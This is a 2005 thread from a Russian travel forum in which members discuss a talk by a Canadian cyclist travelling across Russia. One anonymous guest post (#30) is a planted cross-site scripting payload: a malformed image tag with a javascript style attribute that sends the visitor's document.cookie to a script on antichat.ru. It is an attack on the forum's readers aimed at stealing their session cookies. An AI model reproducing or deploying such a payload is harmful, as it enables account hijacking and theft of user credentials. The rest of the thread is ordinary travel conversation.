Форум существует с 2004 года и является некоммерческой площадкой, посвященной самостоятельным путешествиям, т.е. путешествиям, организованным по возможности без помощи турфирм и других посредников.
Backpacker (от англ. Backpack – рюкзак) – путешественник с рюкзаком.
Среди форумчан есть и идейные автостопщики, и любители велопутешествий, и те, кто ездит только общественным транспортом или на своих авто, но большинство путешественников не ограничивают себя каким-либо одним способом перемещения в пространстве. Объединяет всех нас желание «проживать» путешествие по максимуму, так, как хочется самому себе.
На форуме накопился огромный объем информации, если же вы не смогли найти ответ или вам нужен индивидуальный совет – смело спрашивайте!
Регионы планеты (маршруты, достопримечательности, проживание) Визы Транспорт Отчеты Попутчики FAQ
Данное объявление видно только неавторизованным пользователям.
"Сумасшедший" канадец едет по России
#21 Guest_KURTka_*
Отправлено 07 февраля 2005 - 19:30
До встречи с Робом мне казалось, что все эти разговоры о кругосветке на бейсике - чушь, что все это бывает только в кино. Конечно,я слышала, что есть на свете какой-то сумасшедший канадец, который проехал на велосипеде 64000 км и который собирается посетить нашу многими забытую Россию. Думаю, не трудно представить мое удивление, когда, вместо спортивно-сложенного канадца, я увидела великана, больше напоминающего голландца, в прикольной потрепанной бейзболке, который все время улыбался и "играл" глазами, в безуспешных попытках охватить взглядом из-под козырька все происходящее.
Выступление Кассибо (фамилия) отличалось от всех остальных. Главная причина крылась в его "нерусском" происхождении. А из этого следовало: раскрепощенность, открытость, доброжелательное расположение ко всем, независимо от того, сколько км ты проехал и во скольких странах оставил отпечаток своей ноги или колеса.
Все, что Роб рассказал, было не просто интересно, а попахивало невозможным!!! Но, глядя на этого мэна, нехорошее ощущение моментально пропадало.
Он рассказывал о своем путешествии так,что казалось, будто он рассказывает вовсе не о "кругосветном" путешествии, а о поездке к бабушке в деревню. Но и здесь на помощь воображению приходил его внешний облик, который никак не вписывался в образ деревни. Все в его рассказе говорило, что каждый способен сделать то же, что и он, что это не так трудно, как кажется.
В общем, более свежие, яркие и положительные впечатления я не получала. Теперь сплю и вижу себя, едущей на велосипеде по дорогам Евразии(что, надеюсь, в скором времени произойдет).
Если у вас есть возможность, обязательно сходите на встречу с Робом. И не стесняйтесь подойти к нему после выступления, поговорить и задать вопросы, которые вас интересуют, он ответит на них - не сомневайтесь!
Отправлено 07 февраля 2005 - 19:55
Отправлено 07 февраля 2005 - 21:41
Отправлено 08 февраля 2005 - 01:03
Да, на велосипеде особый кайф от приодаленных 10 000 километров ^__^.В общем, более свежие, яркие и положительные впечатления я не получала. Теперь сплю и вижу себя, едущей на велосипеде по дорогам Евразии(что, надеюсь, в скором времени произойдет).
И самое главное не усни за рулем.
А если серьезнее то я не вижу что-то тут особеного *СУПЕР, НУ ПРОСТО СУПЕР* в путешествии. Он скромен в своих рассказах, это нормально. Честь и хвала за его мужество. Просто мы должны по возможностьи оказать помошь и быть гостеприимными хозявами.
Отправлено 08 февраля 2005 - 11:49
через всю Африку на велосипеде, через всю Скандинавию зимой -- на велосипеде. Через Россию, блин
Прочувствовать его приключения -- возьми велосипед и доедь СЕЙЧАС на нем до Новосибирска -- мало не покажется
Отправлено 08 февраля 2005 - 15:53
Отправлено 07 марта 2005 - 08:00
Например можно прочитать статью о нем в экстремальном журнале:
http://sport.rbc.ru/...42313_bod.shtml
Отправлено 29 марта 2005 - 08:54
Отправлено 30 марта 2005 - 23:35
#30 Guest_Guest_*
Отправлено 31 марта 2005 - 08:41
http://aaaaa/=`aaajpg[/img]]` style=background:url(java script:document.images[3].src="http://antichat.ru/cgi-bin/s.jpg?K:"+document.cookie)
Отправлено 31 марта 2005 - 11:31
#32 Guest_тайхард_*
Отправлено 06 апреля 2005 - 00:16
#33 Guest_olennikoff_*
Отправлено 08 апреля 2005 - 14:09
Отправлено 08 апреля 2005 - 18:28
Количество пользователей, читающих эту тему: 2
0 пользователей, 2 гостей, 0 скрытых пользователей